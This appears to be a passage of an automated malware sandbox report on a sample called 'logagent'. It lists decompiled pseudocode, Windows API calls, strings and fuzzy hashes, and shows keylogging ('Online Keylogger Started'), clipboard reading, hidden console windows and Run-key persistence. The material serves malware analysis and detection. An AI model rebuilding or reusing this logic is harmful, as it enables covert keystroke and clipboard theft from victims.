                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • CreateThread.KERNEL32 ref: 00405C58
                                    • Part of subcall function 00405156: GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                  • CreateThread.KERNEL32 ref: 00405C40
                                  • CreateThread.KERNEL32 ref: 00405C4C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@CreateD@1@@ThreadV01@V10@$?c_str@?$basic_string@LocalTimeV10@@Y?$basic_string@$??4?$basic_string@?length@?$basic_string@EventKeyboardLayoutV01@@V10@0@freemallocprintfsprintf
                                  • String ID: Online Keylogger Started$[INFO]
                                  • API String ID: 3243250608-3343292223
                                  • Opcode ID: a8e662678da6ae76e9fc608fff52aafdf6fc640e70994fb474de8f560b873d38
                                  • Instruction ID: c910a21b19b54318fc77c553f5add3804aa9723349d7e3508c4a5a722b276437
                                  • Opcode Fuzzy Hash: a8e662678da6ae76e9fc608fff52aafdf6fc640e70994fb474de8f560b873d38
                                  • Instruction Fuzzy Hash: 4011E5A0604B0CBFF71077768CC6CBF7A6CDE81698740047EF40262281DAB95C448EB9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E1054FAA5(intOrPtr* __ecx) {
                                  				void* _t13;
                                  				struct HWND__* _t19;
                                  				void* _t30;
                                  				void* _t31;
                                  
                                  				_push(_t19);
                                  				if( *__ecx() != 0) {
                                  					EmptyClipboard();
                                  					CloseClipboard();
                                  					if(OpenClipboard(_t19) != 0) {
                                  						_t13 = GetClipboardData(1); // 1 == CF_TEXT: fetch the clipboard's ANSI text
                                  						_t30 = _t13;
                                  						GlobalFix(_t30); // GlobalFix/GlobalUnWire: legacy 16-bit-era lock/unlock calls used in place of GlobalLock/GlobalUnlock
                                  						_t28 = _t13;
                                  						GlobalUnWire(_t30);
                                  						CloseClipboard();
                                  						if(_t13 == _t19) {
                                  							_t28 = 0x415664;
                                  						}
                                  						 *0x415318(_t31 - 0x25);
                                  						E10543A51(0x41be70, 0x6b, _t28);
                                  					}
                                  				}
                                  				E1054316C(_t31 - 0x10);
                                  				 *0x415348();
                                  				 *0x415348();
                                  				return 0;
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$CloseGlobal$DataEmptyOpenWire
                                  • String ID: dVA
                                  • API String ID: 931577478-1571107130
                                  • Opcode ID: 0184a05d3131f65cd90b73fc5bb7c45af23118e502efa0db784828fb52c93016
                                  • Instruction ID: 3fc53a0e1b8c030d6c79959beb05b266a9e5851330eee6192903a9b6b508b74d
                                  • Opcode Fuzzy Hash: 0184a05d3131f65cd90b73fc5bb7c45af23118e502efa0db784828fb52c93016
                                  • Instruction Fuzzy Hash: 9C014F31610905DFDB04ABB4EC5CBEE3B69EF94392B508035F507C60A1EF708885CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 20%
                                  			E0040E254(void* __eax, void* __eflags) {
                                  				void* _t7;
                                  				void* _t9;
                                  				void* _t28;
                                  
                                  				_t33 = __eflags;
                                  				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t7 = E0040180C(_t28 - 0x10, __eflags, 0);
                                  				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				_t9 = E0040180C(_t28 - 0x10, _t33, 0);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				E0040B8F8(_t33, 0x80000001, _t9, "name", _t9, _t7 + 1, __eax, __eax, 3);
                                  				E004017DD(_t28 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}

                                  APIs
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040E25D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040E266
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,00000000), ref: 0040E27A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000001), ref: 0040E28D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,00000000), ref: 0040E29E
                                    • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                    • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@$??0?$basic_string@?length@?$basic_string@?size@?$basic_string@V01@@
                                  • String ID: name
                                  • API String ID: 4248281052-1579384326
                                  • Opcode ID: 83e4fc8ba24890861120159763b2a38f5dda00935ac70df88cfa2c43dd0e8913
                                  • Instruction ID: 9ee346064aa2c941639b0d7d09d57cd35de4d8052a4636764cc5c845d749206a
                                  • Opcode Fuzzy Hash: 83e4fc8ba24890861120159763b2a38f5dda00935ac70df88cfa2c43dd0e8913
                                  • Instruction Fuzzy Hash: 6DF01D72A00518DFDB05ABE1EC599FE7768EB94345B00843EE513A70E0EF780905CB5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E00411AF5(void* __ecx, WCHAR* _a4) {
                                  				char _v5;
                                  				char _v6;
                                  				void* _t13;
                                  
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(__ecx);
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  				E0041203B("[ALARM]",  &_v6, "Alarm has been triggered!",  &_v5, _t13);
                                  				PlaySoundW(_a4, GetModuleHandleA(0), 0x20009); // SND_FILENAME | SND_LOOP | SND_ASYNC: loop the sound file named by _a4
                                  				Sleep(0x2710); // 10 000 ms
                                  				return PlaySoundW(0, 0, 0); // stop playback
                                  			}

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Alarm has been triggered!,?,?,?,00411AE8,00000000), ref: 00411B08
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ALARM],?), ref: 00411B1C
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00411B31
                                  • PlaySoundW.WINMM(?,00000000), ref: 00411B41
                                  • Sleep.KERNEL32(00002710), ref: 00411B48
                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00411B54
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@PlaySoundV10@$?c_str@?$basic_string@HandleLocalModuleSleepTimeV10@0@V10@@printf
                                  • String ID: Alarm has been triggered!$[ALARM]
                                  • API String ID: 4004766653-1190268461
                                  • Opcode ID: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                  • Instruction ID: 5adc9307e5d744e325bca41e58bf78e276225457fadb31193265d37fe82570ce
                                  • Opcode Fuzzy Hash: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                  • Instruction Fuzzy Hash: 09F08971744218BFEA0077A5DC4BFED3E2DEB44741F400025FD01D61D4EAE069408AEA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 50%
                                  			E0040D8FF() {
                                  				void* _t10;
                                  				char* _t12;
                                  				int _t13;
                                  				char* _t15;
                                  				signed int _t16;
                                  				char* _t18;
                                  				void* _t41;
                                  				void* _t46;
                                  				intOrPtr _t51;
                                  
                                  				_t51 =  *0x41bf20; // 0x0
                                  				 *0x41c119 = 0;
                                  				if(_t51 != 0) {
                                  					E004020F4(_t10, 0x41bf20);
                                  				}
                                  				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t46 - 0x10, _t51, 0));
                                  				_t12 = E0040180C(_t46 - 0x10, _t51, 3);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t13 = atoi(_t12);
                                  				E0040F572();
                                  				_t15 = E0040180C(_t46 - 0x10, _t51, 2);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t16 = atoi(_t15);
                                  				_t18 = E0040180C(_t46 - 0x10, _t16, 1);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				E0040F5F4(_t41, _t52, atoi(_t18), _t16 & 0xffffff00 | _t16 != 0x00000000, _t13);
                                  				E004017DD(_t46 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040D928
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040D93A
                                  • atoi.MSVCRT ref: 0040D947
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D95E
                                  • atoi.MSVCRT ref: 0040D965
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040D97A
                                  • atoi.MSVCRT ref: 0040D981
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                    • Part of subcall function 004020F4: closesocket.WS2_32(0041BE70), ref: 004020F9
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@$??4?$basic_string@V01@V01@@closesocket
                                  • String ID:
                                  • API String ID: 2234106156-0
                                  • Opcode ID: 01ce1ee5bcc4171d1ab48e1a40778728093d77192bc5297049ba7dc6195948f0
                                  • Instruction ID: b6bede96aa3c2da0a069e28b117ba5bdb23d63fcfc1ec7a11f567b0dfa856408
                                  • Opcode Fuzzy Hash: 01ce1ee5bcc4171d1ab48e1a40778728093d77192bc5297049ba7dc6195948f0
                                  • Instruction Fuzzy Hash: 8C111C72A00218DBCB04BBF1EC599EE7769EB94355B00883EE512E71E1EF784909CB5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 1054C61B: TerminateProcess.KERNEL32(00000000,?,10549BE2), ref: 1054C62B
                                    • Part of subcall function 1054C61B: WaitForSingleObject.KERNEL32(000000FF,?,10549BE2), ref: 1054C63E
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 1054A045
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 1054A055
                                    • Part of subcall function 105486D0: UnhookWindowsHookEx.USER32(00000000), ref: 105486EE
                                  • _wgetenv.MSVCRT ref: 1054A0AF
                                    • Part of subcall function 105546E5: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,[DEBUG],00000000), ref: 10554722
                                  • ShellExecuteW.SHELL32(00000000,0041578C,00000000), ref: 1054A303
                                  • exit.MSVCRT ref: 1054A30F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreateDeleteExecuteHookModuleNameObjectProcessShellSingleTerminateUnhookWaitWindows_wgetenvexit
                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run\$TcA
                                  • API String ID: 408532493-1424891482
                                  • Opcode ID: 6ad41035b0cb7ce4584f9fe8de384f09d86570fee2b13a79108ac7d106b08e77
                                  • Instruction ID: e97cff4b71fadd8225e7ac675a81589aef3fba0f11d5477686f74cdcb265222b
                                  • Opcode Fuzzy Hash: 6ad41035b0cb7ce4584f9fe8de384f09d86570fee2b13a79108ac7d106b08e77
                                  • Instruction Fuzzy Hash: ABB1617290050DEBDB00EBE0ED5D9EE7B7CEF88345B644066F902E3090EB755A49CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • mciSendStringW.WINMM(00000000), ref: 1055381C
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9), ref: 1055385A
                                  • PathFileExistsW.SHLWAPI(00000000,?,0041B310), ref: 105538DC
                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 10553921
                                  • WaitForSingleObject.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 10553932
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 10553942
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Event$CloseCreateExistsFileHandleObjectPathSendSingleStringWait
                                  • String ID: stopped
                                  • API String ID: 1811012380-2795915500
                                  • Opcode ID: edb5fbe7797f5923e8e19f7f3829259e260694d50504d2670f9a5a4b20d31210
                                  • Instruction ID: 808b5e63c46b8587966f186a7f2202eafa8a868550e61cc1c0736f8531186118
                                  • Opcode Fuzzy Hash: edb5fbe7797f5923e8e19f7f3829259e260694d50504d2670f9a5a4b20d31210
                                  • Instruction Fuzzy Hash: 976172B199061DFFDB00AFA0DC99DFA3F7DEB44384B408026F906D70A1EA759D488B65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • _EH_prolog.MSVCRT ref: 105524AF
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 10552593
                                  • GetLocalTime.KERNEL32(?), ref: 10552640
                                  • _swprintf.MSVCRT ref: 10552683
                                    • Part of subcall function 105522CE: SHCreateMemStream.SHLWAPI(00000000), ref: 10552329
                                    • Part of subcall function 105522CE: DeleteFileW.KERNEL32(00000000), ref: 105523B1
                                  • atoi.MSVCRT ref: 10552731
                                  • atoi.MSVCRT ref: 1055275F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Createatoi$DeleteDirectoryFileH_prologLocalStreamTime_swprintf
                                  • String ID: <BA
                                  • API String ID: 489643954-295999847
                                  • Opcode ID: 1397e67a475f5d5496000406f8d320cffe048bc57ff684fc558b4ae63076313c
                                  • Instruction ID: 74cdb44f967d51c32c920a259b5b3c91e6c1c6cbbbca2a736adacd82fc2d724c
                                  • Opcode Fuzzy Hash: 1397e67a475f5d5496000406f8d320cffe048bc57ff684fc558b4ae63076313c
                                  • Instruction Fuzzy Hash: D6718371900519EBDB109BA0DC9DBEE7B78EF89341F1480AAF509E7090EF745A89CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Sleep.KERNEL32(00002710), ref: 10546F96
                                    • Part of subcall function 10546EC1: CreateFileW.KERNEL32(00000000), ref: 10546EF8
                                    • Part of subcall function 10546EC1: GetFileSize.KERNEL32(00000000,00000000), ref: 10546F07
                                    • Part of subcall function 10546EC1: Sleep.KERNEL32(00002710), ref: 10546F36
                                    • Part of subcall function 10546EC1: CloseHandle.KERNEL32(00000000), ref: 10546F3D
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 10546FD5
                                  • GetFileAttributesW.KERNEL32(00000000), ref: 10546FE7
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 10546FFF
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 10547086
                                    • Part of subcall function 1055476E: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,105435A8,00000000), ref: 10554788
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 10547187
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                  • String ID: dVA
                                  • API String ID: 3795512280-1571107130
                                  • Opcode ID: 338acc06453109cd0e6d1d3b9df89dcd6d5f75a7b173938059bb45aca4593fb9
                                  • Instruction ID: b8586eb6af0a19c3da14e8a9f5a77bb8bdb0eeac9fdc84eba283579dc6cba3d0
                                  • Opcode Fuzzy Hash: 338acc06453109cd0e6d1d3b9df89dcd6d5f75a7b173938059bb45aca4593fb9
                                  • Instruction Fuzzy Hash: 6A512D72A00909EBCB05ABE0EC5DADE7B78EF88355F008069F503D71A0EF749945CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • getenv.MSVCRT ref: 1055096B
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 10550A20
                                  • WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 10550A58
                                  • CloseHandle.KERNEL32(?), ref: 10550A61
                                  • DeleteFileA.KERNEL32(00000000), ref: 10550A71
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitgetenv
                                  • String ID: <$@
                                  • API String ID: 264928323-1426351568
                                  • Opcode ID: e1059c01280107604bb04a6877df16a1a878e402cadb1299a5217f872fcd5d73
                                  • Instruction ID: 68683fee51e434fc0409dd07b24f8c24cff4349a873a5f7d84f402939f04ac70
                                  • Opcode Fuzzy Hash: e1059c01280107604bb04a6877df16a1a878e402cadb1299a5217f872fcd5d73
                                  • Instruction Fuzzy Hash: 9841627190061DEBDB04EFE0DC8AEEE7B79EF84741F104026F512A6190EBB45A49CF94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 63%
                                  			E105556CC(signed int __edx, intOrPtr _a4) {
                                  				void _v1003;
                                  				char _v1004;
                                  				struct HWND__* _t13;
                                  				signed int _t34;
                                  				signed int _t36;
                                  				unsigned int _t40;
                                  				signed int _t41;
                                  				signed int _t47;
                                  				signed int _t50;
                                  				signed int _t56;
                                  				signed int _t59;
                                  				signed int _t64;
                                  				signed int _t65;
                                  				void* _t91;
                                  				void* _t92;
                                  				void* _t93;
                                  
                                  				_t64 = __edx;
                                  				AllocConsole();
                                  				_t13 =  *0x41c1f8();
                                  				 *0x41c1fc = _t13;
                                  				if(_a4 == 0) {
                                  					ShowWindow(_t13, 0);
                                  				}
                                  				freopen(0x416e3c, 0x416e44,  *0x415398 + 0x20);
                                  				_v1004 = 0;
                                  				memset( &_v1003, 0, 0xf9 << 2);
                                  				asm("stosw");
                                  				asm("stosb");
                                  				_t65 = _t64 | 0xffffffff;
                                  				asm("repne scasb");
                                  				_t40 =  !_t65;
                                  				_t91 = 0x416e30 - _t40;
                                  				_t41 = _t40 >> 2;
                                  				memcpy(_t91 + _t41 + _t41, _t91, memcpy( &_v1004, _t91, _t41 << 2) & 0x00000003);
                                  				asm("repne scasb");
                                  				_t47 =  !_t65;
                                  				_t92 = 0x4166c4 - _t47;
                                  				_t34 = _t47;
                                  				asm("repne scasb");
                                  				_t50 = _t34 >> 2;
                                  				memcpy( &_v1004 - 1, _t92, _t50 << 2);
                                  				memcpy(_t92 + _t50 + _t50, _t92, _t34 & 0x00000003);
                                  				asm("repne scasb");
                                  				_t56 =  !_t65;
                                  				_t93 = 0x416e14 - _t56;
                                  				_t36 = _t56;
                                  				asm("repne scasb");
                                  				_t59 = _t36 >> 2;
                                  				memcpy( &_v1004 - 1, _t93, _t59 << 2);
                                  				memcpy(_t93 + _t59 + _t59, _t93, _t36 & 0x00000003);
                                  				return printf( &_v1004);
                                  			}
                                  0x105556cc
                                  0x105556d8
                                  0x105556de
                                  0x105556e6
                                  0x105556ee
                                  0x105556f2
                                  0x105556f2
                                  0x1055570b
                                  0x1055571e
                                  0x10555724
                                  0x10555726
                                  0x10555728
                                  0x10555729
                                  0x10555735
                                  0x10555737
                                  0x10555743
                                  0x1055574d
                                  0x10555759
                                  0x10555762
                                  0x10555764
                                  0x10555768
                                  0x1055576c
                                  0x10555770
                                  0x10555775
                                  0x10555778
                                  0x10555785
                                  0x1055578e
                                  0x10555790
                                  0x10555794
                                  0x10555798
                                  0x1055579c
                                  0x105557a1
                                  0x105557a4
                                  0x105557b2
                                  0x105557c1

                                  APIs
                                  • AllocConsole.KERNEL32(004151CC,0041BCB0,00000000), ref: 105556D8
                                  • ShowWindow.USER32(00000000,00000000), ref: 105556F2
                                  • freopen.MSVCRT ref: 1055570B
                                  • printf.MSVCRT ref: 105557B4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
